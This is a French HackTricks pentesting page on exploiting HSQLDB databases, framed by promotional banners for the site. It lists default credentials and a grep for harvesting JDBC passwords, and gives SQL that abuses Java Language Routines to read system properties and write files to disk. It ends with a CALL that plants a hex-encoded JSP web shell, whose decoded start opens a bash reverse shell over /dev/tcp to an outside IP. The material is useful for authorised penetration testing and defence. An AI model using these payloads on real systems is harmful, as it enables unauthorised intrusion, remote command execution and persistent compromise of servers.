5.8 KiB
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.
Informations de base
HSQLDB (HyperSQL DataBase) est le principal système de base de données relationnelle SQL écrit en Java. Il offre un moteur de base de données petit, rapide, multithread et transactionnel avec des tables en mémoire et sur disque, et prend en charge les modes embarqué et serveur.
Port par défaut : 9001
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
Information
Paramètres par défaut
Notez que par défaut, ce service fonctionne probablement en mémoire ou est lié à localhost. Si vous l'avez trouvé, vous avez probablement exploité un autre service et cherchez à escalader les privilèges.
Les identifiants par défaut sont généralement sa
avec un mot de passe vide.
Si vous avez exploité un autre service, recherchez des identifiants possibles en utilisant
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
Notez soigneusement le nom de la base de données - vous en aurez besoin pour vous connecter.
Collecte d'informations
Connectez-vous à l'instance de la base de données en téléchargeant HSQLDB et en extrayant hsqldb/lib/hsqldb.jar
. Exécutez l'application GUI beurk
en utilisant java -jar hsqldb.jar
et connectez-vous à l'instance en utilisant les identifiants découverts/faibles.
Notez que l'URL de connexion ressemblera à ceci pour un système distant : jdbc:hsqldb:hsql://ip/DBNAME
.
Astuces
Routinnes de langage Java
Nous pouvons appeler des méthodes statiques d'une classe Java depuis HSQLDB en utilisant des Routinnes de Langage Java. Notez que la classe appelée doit être dans le chemin de classe de l'application.
Les JRT peuvent être des fonctions
ou des procédures
. Les fonctions peuvent être appelées via des instructions SQL si la méthode Java renvoie une ou plusieurs variables primitives compatibles avec SQL. Elles sont invoquées en utilisant l'instruction VALUES
.
Si la méthode Java que nous voulons appeler renvoie void, nous devons utiliser une procédure invoquée avec l'instruction CALL
.
Lecture des propriétés système Java
Créer une fonction :
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
Exécuter la fonction :
VALUES(getsystemproperty('user.name'))
Vous pouvez trouver une liste des propriétés système ici.
Écrire du Contenu dans un Fichier
Vous pouvez utiliser le gadget Java com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename
situé dans le JDK chargé automatiquement dans le chemin de classe de l'application
pour écrire des éléments encodés en hexadécimal sur le disque via une procédure personnalisée. Notez la taille maximale de 1024 octets.
Créer une procédure :
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
Exécuter la procédure :
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks:
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.